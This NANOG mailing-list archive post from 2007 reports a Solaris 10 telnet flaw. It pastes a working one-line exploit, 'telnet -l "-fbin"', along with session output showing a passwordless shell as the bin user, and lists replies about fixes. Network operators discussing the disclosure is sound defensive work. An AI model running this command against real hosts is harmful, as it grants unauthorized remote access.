nanog mailing list archives
Solaris 10 Telnet Exploit
From: William Schultz <wschultz () bsdboy com>
Date: Sun, 11 Feb 2007 19:30:27 -0800
http://erratasec.blogspot.com/2007/02/trivial-remote-solaris-0day- disable.html
Tested on Sol10, and it indeed works... Good thing we use SSH, right?! ################################ iWil:~ wschultz$ telnet -l "-fbin" dns1 Trying A.B.C.D... Connected to dns1.my.com. Escape character is '^]'. Last login: Sun Feb 11 18:11:05 from A.B.C.D Sun Microsystems Inc. SunOS 5.10 Generic January 2005 $ id uid=2(bin) gid=2(bin) $ ################################
Current thread:
- Solaris 10 Telnet Exploit William Schultz (Feb 11)
- Re: Solaris 10 Telnet Exploit Gadi Evron (Feb 11)
- Re: Solaris 10 Telnet Exploit Gadi Evron (Feb 11)
- Solaris telnet vuln solutions digest and network risks Gadi Evron (Feb 13)
- Re: Solaris telnet vuln solutions digest and network risks Albert Meyer (Feb 13)
- Re: Solaris telnet vuln solutions digest and network risks Gadi Evron (Feb 13)
- Re: Solaris telnet vuln solutions digest and network risks Joseph S D Yao (Feb 15)
- Re: Solaris telnet vuln solutions digest and network risks Albert Meyer (Feb 13)